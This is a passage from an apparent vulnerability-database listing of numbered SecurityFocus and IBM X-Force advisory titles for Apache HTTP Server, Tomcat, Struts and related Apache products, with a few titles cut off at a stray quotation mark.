7606| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
7607| [5992] Apache HTDigest Insecure Temporary File Vulnerability
7608| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
7609| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
7610| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
7611| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
7612| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
7613| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
7614| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
7615| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
7616| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
7617| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
7618| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
7619| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
7620| [5485] Apache 2.0 Path Disclosure Vulnerability
7621| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
7622| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
7623| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
7624| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
7625| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
7626| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
7627| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
7628| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
7629| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
7630| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
7631| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
7632| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
7633| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
7634| [4437] Apache Error Message Cross-Site Scripting Vulnerability
7635| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
7636| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
7637| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
7638| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
7639| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
7640| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
7641| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
7642| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
7643| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
7644| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
7645| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
7646| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
7647| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
7648| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
7649| [3596] Apache Split-Logfile File Append Vulnerability
7650| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
7651| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
7652| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
7653| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
7654| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
7655| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
7656| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
7657| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
7658| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
7659| [3169] Apache Server Address Disclosure Vulnerability
7660| [3009] Apache Possible Directory Index Disclosure Vulnerability
7661| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
7662| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
7663| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
7664| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
7665| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
7666| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
7667| [2216] Apache Web Server DoS Vulnerability
7668| [2182] Apache /tmp File Race Vulnerability
7669| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
7670| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
7671| [1821] Apache mod_cookies Buffer Overflow Vulnerability
7672| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
7673| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
7674| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
7675| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
7676| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
7677| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
7678| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
7679| [1457] Apache::ASP source.asp Example Script Vulnerability
7680| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
7681| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
7682|
7683| IBM X-Force - https://exchange.xforce.ibmcloud.com:
7839| [71093] Apache HTTP Server ap_pregsub() buffer overflow
7840| [70336] Apache HTTP Server mod_proxy information disclosure
7841| [69804] Apache HTTP Server mod_proxy_ajp denial of service
7842| [69472] Apache Tomcat AJP security bypass
7843| [69396] Apache HTTP Server ByteRange filter denial of service
7844| [69394] Apache Wicket multi window support cross-site scripting
7845| [69176] Apache Tomcat XML information disclosure
7846| [69161] Apache Tomcat jsvc information disclosure
7847| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
7848| [68541] Apache Tomcat sendfile information disclosure
7849| [68420] Apache XML Security denial of service
7850| [68238] Apache Tomcat JMX information disclosure
7851| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
7852| [67804] Apache Subversion control rules information disclosure
7853| [67803] Apache Subversion control rules denial of service
7854| [67802] Apache Subversion baselined denial of service
7855| [67672] Apache Archiva multiple cross-site scripting
7856| [67671] Apache Archiva multiple cross-site request forgery
7857| [67564] Apache APR apr_fnmatch() denial of service
7858| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
7859| [67515] Apache Tomcat annotations security bypass
7860| [67480] Apache Struts s:submit information disclosure
7861| [67414] Apache APR apr_fnmatch() denial of service
7862| [67356] Apache Struts javatemplates cross-site scripting
7863| [67354] Apache Struts Xwork cross-site scripting
7864| [66676] Apache Tomcat HTTP BIO information disclosure
7865| [66675] Apache Tomcat web.xml security bypass
7866| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
7867| [66241] Apache HttpComponents information disclosure
7868| [66154] Apache Tomcat ServletSecurity security bypass
7869| [65971] Apache Tomcat ServletSecurity security bypass
7870| [65876] Apache Subversion mod_dav_svn denial of service
7871| [65343] Apache Continuum unspecified cross-site scripting
7872| [65162] Apache Tomcat NIO connector denial of service
7873| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
7874| [65160] Apache Tomcat HTML Manager interface cross-site scripting
7875| [65159] Apache Tomcat ServletContect security bypass
7876| [65050] Apache CouchDB web-based administration UI cross-site scripting
7877| [64773] Oracle HTTP Server Apache Plugin unauthorized access
7878| [64473] Apache Subversion blame -g denial of service
7879| [64472] Apache Subversion walk() denial of service
7880| [64407] Apache Axis2 CVE-2010-0219 code execution
7881| [63926] Apache Archiva password privilege escalation
7882| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
7883| [63493] Apache Archiva credentials cross-site request forgery
7884| [63477] Apache Tomcat HttpOnly session hijacking
7885| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
7886| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
7887| [62959] Apache Shiro filters security bypass
7888| [62790] Apache Perl cgi module denial of service
7889| [62576] Apache Qpid exchange denial of service
7890| [62575] Apache Qpid AMQP denial of service
7891| [62354] Apache Qpid SSL denial of service
7892| [62235] Apache APR-util apr_brigade_split_line() denial of service
7893| [62181] Apache XML-RPC SAX Parser information disclosure
7894| [61721] Apache Traffic Server cache poisoning
7895| [61202] Apache Derby BUILTIN authentication functionality information disclosure
7896| [61186] Apache CouchDB Futon cross-site request forgery
7897| [61169] Apache CXF DTD denial of service
7898| [61070] Apache Jackrabbit search.jsp SQL injection
7899| [61006] Apache SLMS Quoting cross-site request forgery
7900| [60962] Apache Tomcat time cross-site scripting
7901| [60883] Apache mod_proxy_http information disclosure
7902| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
7903| [60264] Apache Tomcat Transfer-Encoding denial of service
7904| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
7905| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
7906| [59413] Apache mod_proxy_http timeout information disclosure
7907| [59058] Apache MyFaces unencrypted view state cross-site scripting
7908| [58827] Apache Axis2 xsd file include
7909| [58790] Apache Axis2 modules cross-site scripting
7910| [58299] Apache ActiveMQ queueBrowse cross-site scripting
7911| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
7912| [58056] Apache ActiveMQ .jsp source code disclosure
7913| [58055] Apache Tomcat realm name information disclosure
7914| [58046] Apache HTTP Server mod_auth_shadow security bypass
7915| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
7916| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
7917| [57429] Apache CouchDB algorithms information disclosure
7918| [57398] Apache ActiveMQ Web console cross-site request forgery
7919| [57397] Apache ActiveMQ createDestination.action cross-site scripting
7920| [56653] Apache HTTP Server DNS spoofing
7921| [56652] Apache HTTP Server DNS cross-site scripting
7922| [56625] Apache HTTP Server request header information disclosure
7923| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
7924| [56623] Apache HTTP Server mod_proxy_ajp denial of service
7925| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
7926| [55857] Apache Tomcat WAR files directory traversal
7927| [55856] Apache Tomcat autoDeploy attribute security bypass
7928| [55855] Apache Tomcat WAR directory traversal
7929| [55210] Intuit component for Joomla! Apache information disclosure
7930| [54533] Apache Tomcat 404 error page cross-site scripting
7931| [54182] Apache Tomcat admin default password
7932| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
7933| [53666] Apache HTTP Server Solaris pollset support denial of service
7934| [53650] Apache HTTP Server HTTP basic-auth module security bypass
7935| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
7936| [53041] mod_proxy_ftp module for Apache denial of service
7937| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
7938| [51953] Apache Tomcat Path Disclosure
7939| [51952] Apache Tomcat Path Traversal
7940| [51951] Apache stronghold-status Information Disclosure
7941| [51950] Apache stronghold-info Information Disclosure
7942| [51949] Apache PHP Source Code Disclosure
7943| [51948] Apache Multiviews Attack
7944| [51946] Apache JServ Environment Status Information Disclosure
7945| [51945] Apache error_log Information Disclosure
7946| [51944] Apache Default Installation Page Pattern Found
7947| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
7948| [51942] Apache AXIS XML External Entity File Retrieval
7949| [51941] Apache AXIS Sample Servlet Information Leak
7950| [51940] Apache access_log Information Disclosure
7951| [51626] Apache mod_deflate denial of service
7952| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
7953| [51365] Apache Tomcat RequestDispatcher security bypass
7954| [51273] Apache HTTP Server Incomplete Request denial of service
7955| [51195] Apache Tomcat XML information disclosure
7956| [50994] Apache APR-util xml/apr_xml.c denial of service
7957| [50993] Apache APR-util apr_brigade_vprintf denial of service
7958| [50964] Apache APR-util apr_strmatch_precompile() denial of service
7959| [50930] Apache Tomcat j_security_check information disclosure
7960| [50928] Apache Tomcat AJP denial of service
7961| [50884] Apache HTTP Server XML ENTITY denial of service
7962| [50808] Apache HTTP Server AllowOverride privilege escalation
7963| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
7964| [50059] Apache mod_proxy_ajp information disclosure
7965| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
7966| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
7967| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
7968| [49921] Apache ActiveMQ Web interface cross-site scripting
7969| [49898] Apache Geronimo Services/Repository directory traversal
7970| [49725] Apache Tomcat mod_jk module information disclosure
7971| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
7972| [49712] Apache Struts unspecified cross-site scripting
7973| [49213] Apache Tomcat cal2.jsp cross-site scripting
7974| [48934] Apache Tomcat POST doRead method information disclosure
7975| [48211] Apache Tomcat header HTTP request smuggling
7976| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
7977| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
7978| [47709] Apache Roller "
7979| [47104] Novell Netware ApacheAdmin console security bypass
7980| [47086] Apache HTTP Server OS fingerprinting unspecified
7981| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
7982| [45791] Apache Tomcat RemoteFilterValve security bypass
7983| [44435] Oracle WebLogic Apache Connector buffer overflow
7984| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
7985| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
7986| [44156] Apache Tomcat RequestDispatcher directory traversal
7987| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
7988| [43885] Oracle WebLogic Server Apache Connector buffer overflow
7989| [42987] Apache HTTP Server mod_proxy module denial of service
7990| [42915] Apache Tomcat JSP files path disclosure
7991| [42914] Apache Tomcat MS-DOS path disclosure
7992| [42892] Apache Tomcat unspecified unauthorized access
7993| [42816] Apache Tomcat Host Manager cross-site scripting
7994| [42303] Apache 403 error cross-site scripting
7995| [41618] Apache-SSL ExpandCert() authentication bypass
7996| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
7997| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
7998| [40614] Apache mod_jk2 HTTP Host header buffer overflow
7999| [40562] Apache Geronimo init information disclosure
8000| [40478] Novell Web Manager webadmin-apache.conf security bypass
8001| [40411] Apache Tomcat exception handling information disclosure
8002| [40409] Apache Tomcat native (APR based) connector weak security
8003| [40403] Apache Tomcat quotes and %5C cookie information disclosure
8004| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
8005| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
8006| [39867] Apache HTTP Server mod_negotiation cross-site scripting
8007| [39804] Apache Tomcat SingleSignOn information disclosure
8008| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
8009| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
8010| [39608] Apache HTTP Server balancer manager cross-site request forgery
8011| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
8012| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
8013| [39472] Apache HTTP Server mod_status cross-site scripting
8014| [39201] Apache Tomcat JULI logging weak security
8015| [39158] Apache HTTP Server Windows SMB shares information disclosure
8016| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
8017| [38951] Apache::AuthCAS Perl module cookie SQL injection
8018| [38800] Apache HTTP Server 413 error page cross-site scripting
8019| [38211] Apache Geronimo SQLLoginModule authentication bypass
8020| [37243] Apache Tomcat WebDAV directory traversal
8021| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
8022| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
8023| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
8024| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
8025| [36782] Apache Geronimo MEJB unauthorized access
8026| [36586] Apache HTTP Server UTF-7 cross-site scripting
8027| [36468] Apache Geronimo LoginModule security bypass
8028| [36467] Apache Tomcat functions.jsp cross-site scripting
8029| [36402] Apache Tomcat calendar cross-site request forgery
8030| [36354] Apache HTTP Server mod_proxy module denial of service
8031| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
8032| [36336] Apache Derby lock table privilege escalation
8033| [36335] Apache Derby schema privilege escalation
8034| [36006] Apache Tomcat "
8035| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
8036| [35999] Apache Tomcat \"
8037| [35795] Apache Tomcat CookieExample cross-site scripting
8038| [35536] Apache Tomcat SendMailServlet example cross-site scripting
8039| [35384] Apache HTTP Server mod_cache module denial of service
8040| [35097] Apache HTTP Server mod_status module cross-site scripting
8041| [35095] Apache HTTP Server Prefork MPM module denial of service
8042| [34984] Apache HTTP Server recall_headers information disclosure
8043| [34966] Apache HTTP Server MPM content spoofing
8044| [34965] Apache HTTP Server MPM information disclosure
8045| [34963] Apache HTTP Server MPM multiple denial of service
8046| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
8047| [34869] Apache Tomcat JSP example Web application cross-site scripting
8048| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
8049| [34496] Apache Tomcat JK Connector security bypass
8050| [34377] Apache Tomcat hello.jsp cross-site scripting
8051| [34212] Apache Tomcat SSL configuration security bypass
8052| [34210] Apache Tomcat Accept-Language cross-site scripting
8053| [34209] Apache Tomcat calendar application cross-site scripting
8054| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
8055| [34167] Apache Axis WSDL file path disclosure
8056| [34068] Apache Tomcat AJP connector information disclosure
8057| [33584] Apache HTTP Server suEXEC privilege escalation
8058| [32988] Apache Tomcat proxy module directory traversal
8059| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
8060| [32708] Debian Apache tty privilege escalation
8061| [32441] ApacheStats extract() PHP call unspecified
8062| [32128] Apache Tomcat default account
8063| [31680] Apache Tomcat RequestParamExample cross-site scripting
8064| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
8065| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
8066| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
8067| [30456] Apache mod_auth_kerb off-by-one buffer overflow
8068| [29550] Apache mod_tcl set_var() format string
8069| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
8070| [28357] Apache HTTP Server mod_alias script source information disclosure
8071| [28063] Apache mod_rewrite off-by-one buffer overflow
8072| [27902] Apache Tomcat URL information disclosure
8073| [26786] Apache James SMTP server denial of service
8074| [25680] libapache2 /tmp/svn file upload
8075| [25614] Apache Struts lookupMap cross-site scripting
8076| [25613] Apache Struts ActionForm denial of service
8077| [25612] Apache Struts isCancelled() security bypass
8078| [24965] Apache mod_python FileSession command execution
8079| [24716] Apache James spooler memory leak denial of service
8080| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
8081| [24158] Apache Geronimo jsp-examples cross-site scripting
8082| [24030] Apache auth_ldap module multiple format strings
8083| [24008] Apache mod_ssl custom error message denial of service
8084| [24003] Apache mod_auth_pgsql module multiple syslog format strings
8085| [23612] Apache mod_imap referer field cross-site scripting
8086| [23173] Apache Struts error message cross-site scripting
8087| [22942] Apache Tomcat directory listing denial of service
8088| [22858] Apache Multi-Processing Module code allows denial of service
8089| [22602] RHSA-2005:582 updates for Apache httpd not installed
8090| [22520] Apache mod-auth-shadow "
8091| [22466] ApacheTop symlink
8092| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
8093| [22006] Apache HTTP Server byte-range filter denial of service
8094| [21567] Apache mod_ssl off-by-one buffer overflow
8095| [21195] Apache HTTP Server header HTTP request smuggling
8096| [20383] Apache HTTP Server htdigest buffer overflow
8097| [19681] Apache Tomcat AJP12 request denial of service
8098| [18993] Apache HTTP server check_forensic symlink attack
8099| [18790] Apache Tomcat Manager cross-site scripting
8100| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
8101| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
8102| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
8103| [17961] Apache Web server ServerTokens has not been set
8104| [17930] Apache HTTP Server HTTP GET request denial of service
8105| [17785] Apache mod_include module buffer overflow
8106| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
8107| [17473] Apache HTTP Server Satisfy directive allows access to resources
8108| [17413] Apache htpasswd buffer overflow
8109| [17384] Apache HTTP Server environment variable configuration file buffer overflow
8110| [17382] Apache HTTP Server IPv6 apr_util denial of service
8111| [17366] Apache HTTP Server mod_dav module LOCK denial of service
8112| [17273] Apache HTTP Server speculative mode denial of service
8113| [17200] Apache HTTP Server mod_ssl denial of service
8114| [16890] Apache HTTP Server server-info request has been detected
8115| [16889] Apache HTTP Server server-status request has been detected
8116| [16705] Apache mod_ssl format string attack
8117| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
8118| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
8119| [16230] Apache HTTP Server PHP denial of service
8120| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
8121| [15958] Apache HTTP Server authentication modules memory corruption
8122| [15547] Apache HTTP Server mod_disk_cache local information disclosure
8123| [15540] Apache HTTP Server socket starvation denial of service
8124| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
8125| [15422] Apache HTTP Server mod_access information disclosure
8126| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
8127| [15293] Apache for Cygwin "
8128| [15065] Apache-SSL has a default password
8129| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
8130| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
8131| [14751] Apache Mod_python output filter information disclosure
8132| [14125] Apache HTTP Server mod_userdir module information disclosure
8133| [14075] Apache HTTP Server mod_php file descriptor leak
8134| [13703] Apache HTTP Server account
8135| [13689] Apache HTTP Server configuration allows symlinks
8136| [13688] Apache HTTP Server configuration allows SSI
8137| [13687] Apache HTTP Server Server: header value
8138| [13685] Apache HTTP Server ServerTokens value
8139| [13684] Apache HTTP Server ServerSignature value
8140| [13672] Apache HTTP Server config allows directory autoindexing
8141| [13671] Apache HTTP Server default content
8142| [13670] Apache HTTP Server config file directive references outside content root
8143| [13668] Apache HTTP Server httpd not running in chroot environment
8144| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
8145| [13664] Apache HTTP Server config file contains ScriptAlias entry
8146| [13663] Apache HTTP Server CGI support modules loaded
8147| [13661] Apache HTTP Server config file contains AddHandler entry
8148| [13660] Apache HTTP Server 500 error page not CGI script
8149| [13659] Apache HTTP Server 413 error page not CGI script
8150| [13658] Apache HTTP Server 403 error page not CGI script
8151| [13657] Apache HTTP Server 401 error page not CGI script
8152| [13552] Apache HTTP Server mod_cgid module information disclosure
8153| [13550] Apache GET request directory traversal
8154| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
8155| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
8156| [13429] Apache Tomcat non-HTTP request denial of service
8157| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
8158| [13295] Apache weak password encryption
8159| [13254] Apache Tomcat .jsp cross-site scripting
8160| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
8161| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
8162| [12681] Apache HTTP Server mod_proxy could allow mail relaying
8163| [12662] Apache HTTP Server rotatelogs denial of service
8164| [12554] Apache Tomcat stores password in plain text
8165| [12553] Apache HTTP Server redirects and subrequests denial of service
8166| [12552] Apache HTTP Server FTP proxy server denial of service
8167| [12551] Apache HTTP Server prefork MPM denial of service
8168| [12550] Apache HTTP Server weaker than expected encryption
8169| [12549] Apache HTTP Server type-map file denial of service
8170| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
8171| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
8172| [12091] Apache HTTP Server apr_password_validate denial of service
8173| [12090] Apache HTTP Server apr_psprintf code execution
8174| [11804] Apache HTTP Server mod_access_referer denial of service
8175| [11750] Apache HTTP Server could leak sensitive file descriptors
8176| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
8177| [11703] Apache long slash path allows directory listing
8178| [11695] Apache HTTP Server LF (Line Feed) denial of service
8179| [11694] Apache HTTP Server filestat.c denial of service
8180| [11438] Apache HTTP Server MIME message boundaries information disclosure
8181| [11412] Apache HTTP Server error log terminal escape sequence injection
8182| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
8183| [11195] Apache Tomcat web.xml could be used to read files
8184| [11194] Apache Tomcat URL appended with a null character could list directories
8185| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
8186| [11126] Apache HTTP Server illegal character file disclosure
8187| [11125] Apache HTTP Server DOS device name HTTP POST code execution
8188| [11124] Apache HTTP Server DOS device name denial of service
8189| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
8190| [10938] Apache HTTP Server printenv test CGI cross-site scripting
8191| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
8192| [10575] Apache mod_php module could allow an attacker to take over the httpd process
8193| [10499] Apache HTTP Server WebDAV HTTP POST view source
8194| [10457] Apache HTTP Server mod_ssl "
8195| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
8196| [10414] Apache HTTP Server htdigest multiple buffer overflows
8197| [10413] Apache HTTP Server htdigest temporary file race condition
8198| [10412] Apache HTTP Server htpasswd temporary file race condition
8199| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
8200| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
8201| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
8202| [10280] Apache HTTP Server shared memory scorecard overwrite
8203| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
8204| [10241] Apache HTTP Server Host: header cross-site scripting
8205| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
8206| [10208] Apache HTTP Server mod_dav denial of service
8207| [10206] HP VVOS Apache mod_ssl denial of service
8208| [10200] Apache HTTP Server stderr denial of service
8209| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
8210| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
8211| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
8212| [10098] Slapper worm targets OpenSSL/Apache systems
8213| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
8214| [9875] Apache HTTP Server .var file request could disclose installation path
8215| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
8216| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
8217| [9623] Apache HTTP Server ap_log_rerror() path disclosure
8218| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
8219| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
8220| [9396] Apache Tomcat null character to threads denial of service
8221| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
8222| [9249] Apache HTTP Server chunked encoding heap buffer overflow
8223| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
8224| [8932] Apache Tomcat example class information disclosure
8225| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
8226| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
8227| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
8228| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
8229| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
8230| [8400] Apache HTTP Server mod_frontpage buffer overflows
8231| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
8232| [8308] Apache "
8233| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
8234| [8119] Apache and PHP OPTIONS request reveals "
8235| [8054] Apache is running on the system
8236| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
8237| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
8238| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
8239| [7836] Apache HTTP Server log directory denial of service
8240| [7815] Apache for Windows "
8241| [7810] Apache HTTP request could result in unexpected behavior
8242| [7599] Apache Tomcat reveals installation path
8243| [7494] Apache "
8244| [7419] Apache Web Server could allow remote attackers to overwrite .log files
8245| [7363] Apache Web Server hidden HTTP requests
8246| [7249] Apache mod_proxy denial of service
8247| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
8248| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
8249| [7059] Apache "
8250| [7057] Apache "
8251| [7056] Apache "
8252| [7055] Apache "
8253| [7054] Apache "
8254| [6997] Apache Jakarta Tomcat error message may reveal information
8255| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
8256| [6970] Apache crafted HTTP request could reveal the internal IP address
8257| [6921] Apache long slash path allows directory listing
8258| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
8259| [6527] Apache Web Server for Windows and OS2 denial of service
8260| [6316] Apache Jakarta Tomcat may reveal JSP source code
8261| [6305] Apache Jakarta Tomcat directory traversal
8262| [5926] Linux Apache symbolic link
8263| [5659] Apache Web server discloses files when used with php script
8264| [5310] Apache mod_rewrite allows attacker to view arbitrary files
8265| [5204] Apache WebDAV directory listings
8266| [5197] Apache Web server reveals CGI script source code
8267| [5160] Apache Jakarta Tomcat default installation
8268| [5099] Trustix Secure Linux installs Apache with world writable access
8269| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
8270| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
